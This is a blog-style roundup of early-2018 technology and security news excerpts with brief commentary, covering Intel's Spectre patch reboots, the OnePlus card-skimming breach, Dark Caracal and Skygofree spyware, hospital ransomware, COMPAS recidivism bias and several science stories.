Intel patches for Spectre cause reboots, Intel tells people to stop installing them and also please help test for them

As we start the week, I want to provide an update on the reboot issues we reported Jan. 11. We have now identified the root cause for Broadwell and Haswell platforms, and made good progress in developing a solution to address it. Over the weekend, we began rolling out an early version of the updated solution to industry partners for testing, and we will make a final release available once that testing has been completed.

Based on this, we are updating our guidance for customers and partners:

We recommend that OEMs, cloud service providers, system manufacturers, software vendors and end users stop deployment of current versions, as they may introduce higher than expected reboots and other unpredictable system behavior. For the full list of platforms, see the Intel.com Security Center site.
We ask that our industry partners focus efforts on testing early versions of the updated solution so we can accelerate its release. We expect to share more details on timing later this week.
We continue to urge all customers to vigilantly maintain security best practice and for consumers to keep systems up-to-date.

Source: Root Cause of Reboot Issue Identified; Updated Guidance for Customers and Partners

Amazon.com: Dr.meter Wifi Endoscope, 2.0 Megapixels HD Digital Inspection Camera with 5 Meters(16.4ft) Cable and 8 LEDs in the Camera Handheld Borescope Supports Windows iOS and Android System: Camera & Photo

Amazon.com: Dr.meter Wifi Endoscope, 2.0 Megapixels HD Digital Inspection Camera with 5 Meters(16.4ft) Cable and 8 LEDs in the Camera Handheld Borescope Supports Windows iOS and Android System: Camera & Photo

Source: Amazon.com: Dr.meter Wifi Endoscope, 2.0 Megapixels HD Digital Inspection Camera with 5 Meters(16.4ft) Cable and 8 LEDs in the Camera Handheld Borescope Supports Windows iOS and Android System: Camera & Photo

Revealing True Emotions Through Micro-Expressions: A Machine Learning Approach

Micro-expressions–involuntary, fleeting facial movements that reveal true emotions–hold valuable information for scenarios ranging from security interviews and interrogations to media analysis. They occur on various regions of the face, last only a fraction of a second, and are universal across cultures. In contrast to macro-expressions like big smiles and frowns, micro-expressions are extremely subtle and nearly impossible to suppress or fake. Because micro-expressions can reveal emotions people may be trying to hide, recognizing micro-expressions can aid DoD forensics and intelligence mission capabilities by providing clues to predict and intercept dangerous situations. This blog post, the latest highlighting research from the SEI Emerging Technology Center in machine emotional intelligence, describes our work on developing a prototype software tool to recognize micro-expressions in near real-time.

Source: Revealing True Emotions Through Micro-Expressions: A Machine Learning Approach

Facebook open sources Detectron, object detection framework in caffe2

Today, Facebook AI Research (FAIR) open sourced Detectron — our state-of-the-art platform for object detection research.

The Detectron project was started in July 2016 with the goal of creating a fast and flexible object detection system built on Caffe2, which was then in early alpha development. Over the last year and a half, the codebase has matured and supported a large number of our projects, including Mask R-CNN and Focal Loss for Dense Object Detection, which won the Marr Prize and Best Student Paper awards, respectively, at ICCV 2017. These algorithms, powered by Detectron, provide intuitive models for important computer vision tasks, such as instance segmentation, and have played a key role in the unprecedented advancement of visual perception systems that our community has achieved in recent years.

Source: Facebook open sources Detectron – Facebook Research

Active learning machine learns to create new quantum experiments

We present an autonomous learning model which learns to design such complex experiments, without relying on previous knowledge or often flawed intuition. Our system not only learns how to design desired experiments more efficiently than the best previous approaches, but in the process also discovers nontrivial experimental techniques. Our work demonstrates that learning machines can offer dramatic advances in how experiments are generated.
[…]
The artificial intelligence system learns to create a variety of entangled states and improves the efficiency of their realization. In the process, the system autonomously (re)discovers experimental techniques which are only now becoming standard in modern quantum optical experiments—a trait which was not explicitly demanded from the system but emerged through the process of learning. Such features highlight the possibility that machines could have a significantly more creative role in future research.

Source: Active learning machine learns to create new quantum experiments

The artificial agent develops new experiments by virtually placing mirrors, prisms or beam splitters on a virtual lab table. If its actions lead to a meaningful result, the agent has a higher chance of finding a similar sequence of actions in the future. This is known as a reinforcement learning strategy.

Read more at: https://phys.org/news/2018-01-artificial-agent-quantum.html#jCp

Breakthrough study shows how plants sense the world

Plants lack eyes and ears, but they can still see, hear, smell and respond to environmental cues and dangers—especially to virulent pathogens. They do this with the aid of hundreds of membrane proteins that can sense microbes or other stresses.

Only a small portion of these sensing proteins have been studied through classical genetics, and knowledge on how these sensors function by forming complexes with one another is scarce. Now, an international team of researchers from four nations—including Shahid Mukhtar, Ph.D., and graduate student Timothy “TC” Howton at the University of Alabama at Birmingham—has created the first network map for 200 of these proteins. The map shows how a few key proteins act as master nodes critical for network integrity, and the map also reveals unknown interactions.
[…]
The model plant Arabidopsis thaliana contains more than 600 different receptor kinases—50 times more than humans—that are critical for plant growth, development, immunity and stress response. Until now, only a handful had known functions, and little was known about how the receptors might interact with each to coordinate responses to often-conflicting signals.

For the Nature study, the Belkhadir lab tested interactions between extracellular domains of the receptors in a pairwise manner, working with more than 400 extracellular domains of the LRR-receptor kinases and performing 40,000 interaction tests.

Positive interactions were used to produce an interaction map displaying how those receptor kinases interact with one another, in a total of 567 high-confidence interactions.
[…]
At UAB, Mukhtar and Howton tested 372 intracellular domains of the LRR-receptor kinases whose extracellular domains had shown high-confidence interactions, to see if the intracellular domains also showed strong interactions. More than half did, suggesting that the formation of these receptor complexes is required for signal perception and downstream signal transduction. This also indicates a validation of the biological significance of the extracellular domain interaction
[…]
The Nature study included two major surprises, says Adam Mott, Ph.D., University of Toronto. LRR-receptor kinases that have small extracellular domains interacted with other LRR-receptor kinases more often than those that have large domains. This suggests that the small receptor kinases evolved to coordinate actions of the other receptors. Second, researchers identified several unknown LRR-receptor kinases that appear critical for network integrity.

Source: Breakthrough study shows how plants sense the world

So yes, vegetarians, plants do live and feel and see and detect, you murderers!

American Reich restarts dodgy spying program – just as classified surveillance abuse memo emerges

The US Senate reauthorized a controversial NSA spying program on Thursday – and then, because it’s 2018 and nothing matters any more, embarked on a partisan battle over a confidential memo that outlines Uncle Sam’s alleged abuse of surveillance powers.

Despite numerous appeals, press conferences, competing legislation and speeches outlining abuse of the program, on Thursday a majority of senators ignored pleas for a proper warrant requirement to be added to the program – that would require the Feds to always go to a judge before searching the communications of a US citizen – and voted to continue the surveillance for a further six years.
[…]

However, the agents won’t need a warrant if they are looking into…

Death, kidnapping, serious bodily injury, offense against a minor, destruction of critical infrastructure, cybersecurity, transnational crime, and human trafficking

…which are basically the crimes the FBI investigates. Ergo, it’s unlikely the Feds will seek warrants to search the NSA’s section 702 data stores for stuff on American citizens.

Just hours after the section 702 program was given the final green light before the president can sign on the dotted line, the Senate’s intelligence committee approved the release of a confidential four-page memo alleging previous abuse of the FISA spying program to the rest of Congress. The public is unable to see it.

The mysterious missive was drafted by House intelligence committee chairman Devin Nunes (R-CA), and of course it could be looney-tunes nonsense. Regardless, a number of lawmakers who only now just read the memo have said that had they been aware of the misconduct detailed in the memo, they would not having voted for the reauthorization of section 702 of the FISA Amendments Act.

Republican lawmakers in particular, having seen the report, embarked on a fiercely partisan campaign accusing the Obama administration of snooping on the Trump presidential campaign using the foreigner-targeting FISA laws.
[…]
The hypocrisy is stunning, even for Congress. One moment, Republicans insist a Big Brother program is needed to foil terrorists abroad, ignoring its ability to pry into the lives of Americans. The next moment, Republicans are upset the same set of laws were indeed used to pry into the lives of Americans – some of the folks working for Team Trump.
[…]
Congresscriters who now claim to be shocked – shocked! – about FISA’s sweeping capabilities – have been willfully ignoring determined efforts in both the House and the Senate in recent weeks to have a full debate about the extent of spying powers that the US government possesses
[…]

In one part of that speech, he even went into great detail over how the Director of National Intelligence had publicly denied that Uncle Sam was able to intercept communications between US citizens on US soil – and then, when challenged subsequently, claimed to have heard a different question.

When Wyden asked the same question again, the director refused to answer, claiming that it was classified. “How can a topic in which the director of national intelligence has already given an answer in public suddenly become classified?” asked Wyden in his speech.

But if all that wasn’t enough, we will all likely be subject to one more head-holding display of hypocrisy when President Trump signs the reauthorization bill into law – despite the fact congressfolk are railing against the same set of FISA laws being used to spy on his campaign.

Source: America restarts dodgy spying program – just as classified surveillance abuse memo emerges • The Register

Security Breaches Don’t Affect Stock Price. Or don’t they?

Abstract: This report assesses the impact disclosure of data breaches has on the total returns and volatility of the affected companies’ stock, with a focus on the results relative to the performance of the firms’ peer industries, as represented through selected indices rather than the market as a whole. Financial performance is considered over a range of dates from 3 days post-breach through 6 months post-breach, in order to provide a longer-term perspective on the impact of the breach announcement.

Key findings:

While the difference in stock price between the sampled breached companies and their peers was negative (1.13%) in the first 3 days following announcement of a breach, by the 14th day the return difference had rebounded to + 0.05%, and on average remained positive through the period assessed.

For the differences in the breached companies’ betas and the beta of their peer sets, the differences in the means of 8 months pre-breach versus post-breach was not meaningful at 90, 180, and 360 day post-breach periods.

For the differences in the breached companies’ beta correlations against the peer indices pre- and post-breach, the difference in the means of the rolling 60 day correlation 8 months pre- breach versus post-breach was not meaningful at 90, 180, and 360 day post-breach periods.

In regression analysis, use of the number of accessed records, date, data sensitivity, and malicious versus accidental leak as variables failed to yield an R2 greater than 16.15% for response variables of 3, 14, 60, and 90 day return differential, excess beta differential, and rolling beta correlation differential, indicating that the financial impact on breached companies was highly idiosyncratic.

Based on returns, the most impacted industries at the 3 day post-breach date were U.S. Financial Services, Transportation, and Global Telecom. At the 90 day post-breach date, the three most impacted industries were U.S. Financial Services, U.S. Healthcare, and Global Telecom.

The market isn’t going to fix this. If we want better security, we need to regulate the market.

Source: Security Breaches Don’t Affect Stock Price – Schneier on Security

However, the dataset:

The analysis began with a dataset of 235 recorded data breaches dating back to 2005

is very very small and misses some of the huge breaches such as Equifax.
There is a very telling table in the results that does show that if a breach is hugely public, then share prices do indeed plummet:

So it may also have something to do with how the company handles the breach and how much media attention is out there.

OnePlus say 40,000 customers credit card details breached

1. What happened One of our systems was attacked, and a malicious script was injected into the payment page code to sniff out credit card info while it was being entered. The malicious script operated intermittently, capturing and sending data directly from the user's browser. It has since been eliminated. We have quarantined the infected server and reinforced all relevant system structures. 2. Who's affected Some users who entered their credit card info on oneplus.net between mid-November 2017 and January 11, 2018, may be affected. Credit card info (card numbers, expiry dates and security codes) entered at oneplus.net during this period may be compromised. Users who paid via a saved credit card should NOT be affected. Users who paid via the "Credit Card via PayPal" method should NOT be affected. Users who paid via PayPal should NOT be affected. We have contacted potentially affected users via email.

Source: [Jan 19 Update] An Update on Credit Card Security – OnePlus Forums

Real-world intercontinental quantum communications enabled by the Micius satellite

A joint China-Austria team has performed quantum key distribution between the quantum-science satellite Micius and multiple ground stations located in Xinglong (near Beijing), Nanshan (near Urumqi), and Graz (near Vienna). Such experiments demonstrate the secure satellite-to-ground exchange of cryptographic keys during the passage of the satellite Micius over a ground station. Using Micius as a trusted relay, a secret key was created between China and Europe at locations separated up to 7,600 km on the Earth.
[…]
Within a year after launch, three key milestones for a global-scale quantum internet were achieved: satellite-to-ground decoy-state QKD with kHz rate over a distance of ~1200 km (Liao et al. 2017, Nature 549, 43); satellite-based entanglement distribution to two locations on the Earth separated by ~1200 km and Bell test (Yin et al. 2017, Science 356, 1140), and ground-to-satellite quantum teleportation (Ren et al. 2017, Nature 549, 70). The effective link efficiencies in the satellite-based QKD were measured to be ~20 orders of magnitude larger than direct transmission through optical fibers at the same length of 1200 km. The three experiments are the first steps toward a global space-based quantum internet.

The satellite-based QKD has now been combined with metropolitan quantum networks, in which fibers are used to efficiently and conveniently connect numerous users inside a city over a distance scale of ~100 km. For example, the Xinglong station has now been connected to the metropolitan multi-node quantum network in Beijing via optical fibers. Very recently, the largest fiber-based quantum communication backbone has been built in China, also by Professor Pan’s team, linking Beijing to Shanghai (going through Jinan and Hefei, and 32 trustful relays) with a fiber length of 2000 km. The backbone is being tested for real-world applications by government, banks, securities and insurance companies.

Read more at: https://phys.org/news/2018-01-real-world-intercontinental-quantum-enabled-micius.html#jCp

Source: Real-world intercontinental quantum communications enabled by the Micius satellite

Information engine operates with nearly perfect efficiency

Physicists have experimentally demonstrated an information engine—a device that converts information into work—with an efficiency that exceeds the conventional second law of thermodynamics. Instead, the engine’s efficiency is bounded by a recently proposed generalized second law of thermodynamics, and it is the first information engine to approach this new bound.

The results demonstrate both the feasibility of realizing a “lossless” information engine—so-called because virtually none of the available information is lost but is instead almost entirely converted into work—and also experimentally validates the sharpness of the bound set by the generalized second law.

The physicists, Govind Paneru, Dong Yun Lee, Tsvi Tlusty, and Hyuk Kyu Pak at the Institute for Basic Science in Ulsan, South Korea (Tlusty and Pak are also with the Ulsan National Institute of Science and Technology), have published a paper on the lossless information engine in a recent issue of Physical Review Letters.

[…]
Traditionally, the maximum efficiency with which an engine can convert energy into work is bounded by the second law of thermodynamics. In the past decade, however, experiments have shown that an engine’s efficiency can surpass the second law if the engine can gain information from its surroundings, since it can then convert that information into work. These information engines (or “Maxwell’s demons,” named after the first conception of such a device) are made possible due to a fundamental connection between information and thermodynamics that scientists are still trying to fully understand.

Read more at: https://phys.org/news/2018-01-efficiency.html#jCp
Read more at: https://phys.org/news/2018-01-efficiency.html#jCp

Source: Information engine operates with nearly perfect efficiency

You could soon be manufacturing your own drugs—thanks to 3D printing

Forget those long lines at the pharmacy: Someday soon, you might be making your own medicines at home. That’s because researchers have tailored a 3D printer to synthesize pharmaceuticals and other chemicals from simple, widely available starting compounds fed into a series of water bottle–size reactors. The work, they say, could digitize chemistry, allowing users to synthesize almost any compound anywhere in the world.
[…]
In today’s issue of Science, Cronin and his colleagues report printing a series of interconnected reaction vessels that carry out four different chemical reactions involving 12 separate steps, from filtering to evaporating different solutions. By adding different reagents and solvents at the right times and in a precise order, they were able to convert simple, widely available starting compounds into a muscle relaxant called baclofen. And by designing reactionware to carry out different chemical reactions with different reagents, they produced other medicines, including an anticonvulsant and a drug to fight ulcers and acid reflux.

Source: You could soon be manufacturing your own drugs—thanks to 3D printing | Science | AAAS

Why People Dislike Really Smart Leaders

Intelligence makes for better leaders—from undergraduates to executives to presidents—according to multiple studies. It certainly makes sense that handling a market shift or legislative logjam requires cognitive oomph. But new research on leadership suggests that, at a certain point, having a higher IQ stops helping and starts hurting.
[…]
The researchers looked at 379 male and female business leaders in 30 countries, across fields that included banking, retail and technology. The managers took IQ tests (an imperfect but robust predictor of performance in many areas), and each was rated on leadership style and effectiveness by an average of eight co-workers. IQ positively correlated with ratings of leader effectiveness, strategy formation, vision and several other characteristics—up to a point. The ratings peaked at an IQ of around 120, which is higher than roughly 80 percent of office workers. Beyond that, the ratings declined. The researchers suggest the “ideal” IQ could be higher or lower in various fields, depending on whether technical versus social skills are more valued in a given work culture.

“It’s an interesting and thoughtful paper,” says Paul Sackett, a management professor at University of Minnesota, who was not involved in the research. “To me, the right interpretation of the work would be that it highlights a need to understand what high-IQ leaders do that leads to lower perceptions by followers,” he says. “The wrong interpretation would be, ‘Don’t hire high-IQ leaders.’ ”

Source: Why People Dislike Really Smart Leaders – Scientific American

Someone is touting a mobile, PC spyware platform called Dark Caracal to governments

Dark Caracal [PDF] appears to be controlled from the Lebanon General Directorate of General Security in Beirut – an intelligence agency – and has slurped hundreds of gigabytes of information from devices. It shares its backend infrastructure with another state-sponsored surveillance campaign, Operation Manul, which the EFF claims was operated by the Kazakhstan government last year.

Crucially, it appears someone is renting out the Dark Caracal spyware platform to nation-state snoops.

“This is definitely one group using the same infrastructure,” Eva Galperin, the EFF’s director of cybersecurity, told The Register on Wednesday. “We think there’s a third party selling this to governments.”

Dark Caracal has, we’re told, been used to siphon off information from thousands of targets in over 21 countries – from private documents, call records, audio recordings, and text messages to contact information, and photos from military, government, and business targets, as well as activists and journalists.
[…]
The primary way to pick up Pallas on your gadget is by installing infected applications – such as WhatsApp and Signal ripoffs – from non-official software souks. Pallas doesn’t exploit zero-days to take over a device, but instead relies on users being tricked into installing booby-trapped apps, and granting the malicious software a large variety of permissions. Once in place, it can thus surreptitiously record audio from the phone’s microphone, reveal the gizmo’s location to snoops, and leak all the data the handset contains to its masters.

In addition, the Dark Caracal platform offers another surveillance tool: a previously unseen sample of FinFisher, the spyware package sold to governments to surveil citizens. It’s not known if this was legitimately purchased, or a demo version that was adapted.

On the desktop side, Dark Caracal provides a Delphi-coded Bandook trojan, previously identified in Operation Manul, that commandeers Windows systems. Essentially, marks are tricked into installing and running infected programs signed with a legitimate security certificate. Once up and running, the software nasty downloads more malware from command-and-control servers. The code pest can also be stashed in Microsoft Word documents, and executed using macros – so beware, Office admins.

Source: Someone is touting a mobile, PC spyware platform called Dark Caracal to governments • The Register

New AI System Predicts How Long Patients Will Live With Startling Accuracy

By using an artificially intelligent algorithm to predict patient mortality, a research team from Stanford University is hoping to improve the timing of end-of-life care for critically ill patients.

After parsing through 2 million records, the researchers identified 200,000 patients suitable for the project. The researchers were “agnostic” to disease type, disease stage, severity of admission (ICU versus non-ICU), and so on. All of these patients had associated case reports, including a diagnosis, the number of scans ordered, the types of procedures performed, the number of days spent in the hospital, medicines used, and other factors.

The deep learning algorithm studied the case reports from 160,000 of these patients, and was given the directive: “Given a patient and a date, predict the mortality of that patient within 12 months from that date, using EHR data of that patient from the prior year.” The system was trained to predict patient mortality within the next three to 12 months. Patients with less than three months of lifespan weren’t considered, as that would leave insufficient time for palliative care preparations.

Armed with its new skills, the algorithm was tasked with assessing the remaining 40,000 patients. It did quite well, successfully predicting patient mortality within the 3 to 12 month timespan in nine out of 10 cases. Around 95 percent of patients who were assessed with a low probability of dying within that period lived beyond 12 months. The pilot study proved successful, and the researchers are now hoping their system will be applied more broadly.

Source: New AI System Predicts How Long Patients Will Live With Startling Accuracy

The Man from Earth Sequel ‘Pirated’ on The Pirate Bay – By Its Creators

More than a decade ago, Hollywood was struggling to get to grips with the file-sharing phenomenon. Sharing via BitTorrent was painted as a disease that could kill the movie industry, if it was allowed to take hold. Tough action was the only way to defeat it, the suits concluded.

In 2007, however, a most unusual turn of events showed that piracy could have a magical effect on the success of a movie.

After being produced on a tiny budget, a then little-known independent sci-fi film called “The Man from Earth” turned up on pirate sites, to the surprise of its creators.
[…]
“A week or two before the DVD’s ‘street date’, we jumped 11,000% on the IMDb ‘Moviemeter’ and we were shocked.”

With pirates fueling interest in the movie, a member of the team took an unusual step. Producer Eric Wilkinson wrote to RLSlog, a popular piracy links site – not to berate pirates – but to thank them for catapulting the movie to fame.

“Our independent movie had next to no advertising budget and very little going for it until somebody ripped one of the DVD screeners and put the movie online for all to download. Most of the feedback from everyone who has downloaded ‘The Man From Earth’ has been overwhelmingly positive. People like our movie and are talking about it, all thanks to piracy on the net!” he wrote.
[…]
“Once we realized what was going on, we asked people to make donations to our PayPal page if they saw the movie for free and liked it, because we had all worked for nothing for two years to bring it to the screen, and the only chance we had of surviving financially was to ask people to support us and the project,” Schenkman explains.

“And, happily, many people around the world did donate, although of course only a tiny fraction of the millions and millions of people who downloaded pirated copies.”

Following this early boost The Man from Earth went on to win multiple awards. And, a decade on, it boasts a hugely commendable 8/10 score on IMDb from more than 147,000 voters, with Netflix users leaving over 650,000 ratings, which reportedly translates to well over a million views.
[…]
Yesterday the team behind the movie took matters into their own hands, uploading the movie to The Pirate Bay and other sites so that fans can help themselves.

“It was going to get uploaded regardless of what we did or didn’t do, and we figured that as long as this was inevitable, we would do the uploading ourselves and explain why we were doing it,” Schenkman informs TF.

“And, we would once again reach out to the filesharing community and remind them that while movies may be free to watch, they are not free to make, and we need their support.”

The release, listed here on The Pirate Bay, comes with detailed notes and a few friendly pointers on how the release can be further shared. It also informs people how they can show their appreciation if they like it.

Source: The Man from Earth Sequel ‘Pirated’ on The Pirate Bay – By Its Creators – TorrentFreak

And this is how you make money in the digital age!

Crypto-cash exchange BitConnect pulls plug amid Bitcoin bloodbath

Amid a cryptocurrency price correction that has seen the price of Bitcoin drop by half from its mid-December peak, UK-based cyber-cash lending and exchange biz BitConnect said it is shutting down.

The firm, dogged by accusations that it is a Ponzi scheme, cited bad press, regulatory orders, and cyber attacks for its market exit this week.

BitConnect said it has received two cease-and-desist letters from US financial watchdogs: one from the Texas State Securities Board, and one from the Securities Division of North Carolina’s Secretary of State.

The letter from Texas authorities, an emergency cease-and-desist order sent January 3, 2018, charges the company with fraud and misleading investors.

The letter from North Carolina authorities observes that BitConnect’s purported rate of return amounts to about 3,000 per cent annually.

Noting that such rates “are extremely unusual in financial markets,” the North Carolina letter stated: “Guaranteed annual compounded investment returns of over 3,000 per cent are a known ‘red-flag’ for fraud, specifically for the risk that the investment may be a ‘Ponzi scheme.'”

Source: Crypto-cash exchange BitConnect pulls plug amid Bitcoin bloodbath • The Register

Computer program that tries to determine if you reoffend is racist, wrong and been in use since 2000.

One widely used criminal risk assessment tool, Correctional Offender Management Profiling for Alternative Sanctions (COMPAS; Northpointe, which rebranded itself to “equivant” in January 2017), has been used to assess more than 1 million offenders since it was developed in 1998. The recidivism prediction component of COMPAS—the recidivism risk scale—has been in use since 2000. This software predicts a defendant’s risk of committing a misdemeanor or felony within 2 years of assessment from 137 features about an individual and the individual’s past criminal record.

Although the data used by COMPAS do not include an individual’s race, other aspects of the data may be correlated to race that can lead to racial disparities in the predictions. In May 2016, writing for ProPublica, Angwin et al. (2) analyzed the efficacy of COMPAS on more than 7000 individuals arrested in Broward County, Florida between 2013 and 2014. This analysis indicated that the predictions were unreliable and racially biased. COMPAS’s overall accuracy for white defendants is 67.0%, only slightly higher than its accuracy of 63.8% for black defendants. The mistakes made by COMPAS, however, affected black and white defendants differently: Black defendants who did not recidivate were incorrectly predicted to reoffend at a rate of 44.9%, nearly twice as high as their white counterparts at 23.5%; and white defendants who did recidivate were incorrectly predicted to not reoffend at a rate of 47.7%, nearly twice as high as their black counterparts at 28.0%. In other words, COMPAS scores appeared to favor white defendants over black defendants by underpredicting recidivism for white and overpredicting recidivism for black defendants.
[…]
We have shown that commercial software that is widely used to predict recidivism is no more accurate or fair than the predictions of people with little to no criminal justice expertise who responded to an online survey.
[…]
Although Northpointe does not reveal the details of their COMPAS software, we have shown that their prediction algorithm is equivalent to a simple linear classifier. In addition, despite the impressive sounding use of 137 features, it would appear that a linear classifier based on only 2 features—age and total number of previous convictions—is all that is required to yield the same prediction accuracy as COMPAS.

The question of accurate prediction of recidivism is not limited to COMPAS. A review of nine different algorithmic approaches to predicting recidivism found that eight of the nine approaches failed to make accurate predictions (including COMPAS) (13). In addition, a meta-analysis of nine algorithmic approaches found only moderate levels of predictive accuracy across all approaches and concluded that these techniques should not be solely used for criminal justice decision-making, particularly in decisions of preventative detention
[…]
When considering using software such as COMPAS in making decisions that will significantly affect the lives and well-being of criminal defendants, it is valuable to ask whether we would put these decisions in the hands of random people who respond to an online survey because, in the end, the results from these two approaches appear to be indistinguishable.

Source: The accuracy, fairness, and limits of predicting recidivism | Science Advances

Lenovo inherited a switch authentication bypass

Lenovo has patched an ancient vulnerability in switches that it acquired along with IBM’s hardware businesses and which Big Blue itself acquired when it slurped parts of Nortel.

The bug, which Lenovo refers to as “HP backdoor”, for reasons it has not explained, has been in present in ENOS (Enterprise network operating system) since at least 2004 – when ENOS was still under the hand of Nortel.

Lenovo’s advisory says the issue “was discovered during a Lenovo security audit in the Telnet and Serial Console management interfaces, as well as the SSH and Web management interfaces under certain limited and unlikely conditions”.

There are three vulnerable scenarios, the advisory said:

Authentication via the Telnet or serial consoles, if used for local authentication, “or a combination of RADIUS, TACACS+, or LDAP and local authentication under specific circumstances”;
The Web management interface is vulnerable when the user is authenticating via “a combination of RADIUS or TACACS+ and local authentication”, and then only in “an unlikely condition”; and
“SSH for certain firmware released in May 2004 through June 2004”, again with a combination of RADIUS or TACACS+.

The “unlikely conditions” Lenovo referred to depend on which interface is potentially being attacked.

For SSH access, the management interface is only vulnerable if the system is running firmware created between May and June 2004; RADIUS and/or TACACS+ is enable; the related “backdoor / secure backdoor” local authentication fallback is enabled (in this case, “backdoor” refers to a RADIUS configuration setting); and finally, a RADIUS or TACACS+ timeout occurs.

Source: Lenovo inherited a switch authentication bypass – from Nortel • The Register

Asus Bezel-Free Kit uses illusion to hide bezels in multimonitor setups

The concept is simple. Thin lenses are placed along the seams where screens meet; they contain optical micro-structures that refract light, bending it inward to hide the bezels underneath.
[…]
The kit’s optical obfuscation is designed to work at a specific angle. We selected 130° because it offered the best balance of comfort and immersion in internal testing. Proper fit and alignment are extremely important, so the lenses and associated mounting hardware are made for specific monitors.

Source: Bezel-Free Kit makes multi-monitor setups seamless | ROG – Republic of Gamers Global

OnePlus suspends credit card transactions after fraud

Over the weekend, members of the OnePlus community reported cases of unknown credit card transactions occurring on their credit cards post purchase from oneplus.net. We immediately began to investigate as a matter of urgency, and will keep you updated.
[…]
As a precaution, we are temporarily disabling credit card payments at oneplus.net. PayPal is still available, and we are exploring alternative secure payment options with our service providers.

Source: An Update on Credit Card Security – OnePlus Forums

With the camera problems and data being sent quietly to a Chinese server, OnePlus is not exactly inspiring confidence, which is a shame after such succesful and valuable launch products in the Android space

Skygofree: Serious offensive Android malware, since 2014

At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014. Since then, the implant’s functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals.
[…]
The implant provides the ability to grab a lot of exfiltrated data, like call records, text messages, geolocation, surrounding audio, calendar events, and other memory information stored on the device.
[…]
In the latest implant versions there are 48 different commands. You can find a full list with short descriptions in the Appendix. Here are some of the most notable:

‘geofence’ – this command adds a specified location to the implant’s internal database and when it matches a device’s current location the malware triggers and begins to record surrounding audio.

”social” – this command that starts the ‘AndroidMDMSupport’ service – this allows the files of any other installed application to be grabbed.

‘wifi’ – this command creates a new Wi-Fi connection with specified configurations from the command and enable Wi-Fi if it is disabled.

‘camera’ – this command records a video/capture a photo using the front-facing camera when someone next unlocks the device.

Source: Skygofree: Following in the footsteps of HackingTeam – Securelist

Hospital injects $60,000 into crims’ coffers to cure malware infection

The crooks had infected the network of Hancock Health, in Indiana, with the Samsam software nasty, which scrambled files and demanded payment to recover the documents. The criminals broke in around 9.30pm on January 11 after finding a box with an exploitable Remote Desktop Protocol (RDP) server, and inject their ransomware into connected computers.

Medical IT teams were alerted in early 2016 that hospitals were being targeted by Samsam, although it appears the warnings weren’t heeded in this case.

According to the hospital, the malware spread over the network and was able to encrypt “a number of the hospital’s information systems,” reducing staff to scratching out patient notes on pieces of dead tree.
[…]
The ransomware’s masters accepted the payment, and sent over the decryption keys to unlock the data. As of Monday this week, the hospital said critical systems were up and running and normal services have been resumed.

This doesn’t appear to be a data heist. The hospital claimed no digital patient records were taken from its computers, just made inaccessible. “The life-sustaining and support systems of the hospital remained unaffected during the ordeal, and patient safety was never at risk,” the healthcare provider argued.
[…]
It’s one thing to keep an offline store of sensitive data to prevent ransomware on the network from attacking it. It’s another to keep those backups somewhere so out of reach, they can’t be recovered during a crisis, effectively rendering them useless.

It just proves that when planning disaster recovery, you must consider time-to-restoration as well as the provisioning of backup hardware.

Source: Hospital injects $60,000 into crims’ coffers to cure malware infection • The Register

300 Dutch customers fell for fake popular website ring. Perps picked up and given a few months of prison time.

BCC and MediaMarkt are large electronics stores in NL. Ziggo is a large internet ISP. By linking to fake pages through marktplaats.nl (the Dutch ebay / Craigslist equivalent) people were able to shop for products on the fake sites, which were never delivered. Using a chat interface, the crims tried to gain access to the bank accounts of the marks. It very much surprises me that this kind of fraud only results in a few months in jail.

Een aantal mannen heeft voor grootschalige internetoplichting elk diverse maanden gevangenisstraf gekregen. Zij verdienden vooral aan namaakwebshops van onder meer BCC, MediaMarkt en Ziggo.

Source: Gevangenisstraf voor internetoplichting – Emerce

Microsoft wants to patent mind control – show how stupid the patent system really is

Microsoft has applied to patent a brain control interface, so you’ll be able to “think” your way around a computer device, hands free.Last year, Facebook claimed to have 60 engineers engaged in BCI [brain computer interface] but Microsoft isn’t going to take this sitting down. It’s erm, sitting down and thinking really hard.The application Changing an application state using neurological data was filed last year, and published last week. The inventors recently filed a related patent for a continuous motion controller powered by the brain. (US 2017/0329392: Continuous Motion Controls Operable Using Neurological Data).

Source: Microsoft wants to patent mind control • The Register


The problem is that the actual technology to do this doesn’t exist and they have nothing like a working prototype. Considering brain control has existed for some time, it’s a bit silly that this kind of conceptual work can actually be patented by someone with money. I can come up with loads of patentable ideas, but the bridge to creating some sort of working product is one too far for me. And the costs of patenting all my imaginations are far too high. This system basically puts small inventors at a huge disadvantage, but also pushes out innovation by small companies as they find that technologies they have invented and worked out are suddenly patented after the fact by large companies.

 
Skip to toolbar